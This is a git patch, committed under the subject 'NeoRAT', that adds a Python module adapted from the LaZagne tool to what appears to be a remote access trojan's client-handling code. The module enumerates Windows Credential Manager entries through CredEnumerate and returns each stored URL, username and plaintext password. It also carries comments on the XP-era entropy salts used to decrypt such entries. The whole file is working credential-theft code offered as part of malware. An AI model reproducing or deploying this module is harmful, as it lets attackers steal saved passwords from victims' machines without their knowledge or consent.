From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL <alvin@alvinhavel.com>
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT

---
 .../lazagne/softwares/windows/credman.py           | 34 ++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/windows/credman.py

(limited to 'foreign/client_handling/lazagne/softwares/windows/credman.py')

diff --git a/foreign/client_handling/lazagne/softwares/windows/credman.py b/foreign/client_handling/lazagne/softwares/windows/credman.py
new file mode 100644
index 0000000..309a125
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/windows/credman.py
@@ -0,0 +1,34 @@
+# -*- coding: utf-8 -*- 
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.winstructure import *
+
+
+class Credman(ModuleInfo):
+    def __init__(self):
+        ModuleInfo.__init__(self, 'credman', 'windows', only_from_current_user=True)
+
+    def run(self):
+        pwd_found = []
+        # FOR XP
+        # - password are encrypted with specific salt depending on its Type
+        # entropy = 'abe2869f-9b47-4cd9-a358-c22904dba7f7\\0' # FOR CRED_TYPE_GENERIC
+        # entropy = '82BD0E67-9FEA-4748-8672-D5EFE5B779B0\\0' # FOR CRED_TYPE_DOMAIN_VISIBLE_PASSWORD
+        # CryptUnprotectData(byref(blobIn),None,byref(blobEntropy),None,None,CRYPTPROTECT_UI_FORBIDDEN,byref(blobOut))
+
+        creds = POINTER(PCREDENTIAL)()
+        count = c_ulong()
+
+        if CredEnumerate(None, 0, byref(count), byref(creds)) == 1:
+            for i in range(count.value):
+                c = creds[i].contents
+                if c.Type == CRED_TYPE_GENERIC or c.Type == CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
+                    # Remove password too long
+                    if c.CredentialBlobSize.real < 200:
+                        pwd_found.append({
+                            'URL': c.TargetName,
+                            'Login': c.UserName,
+                            'Password': c.CredentialBlob[:c.CredentialBlobSize.real]  # \\x00 could be deleted
+                        })
+
+            CredFree(creds)
+        return pwd_found
-- 
cgit v1.2.3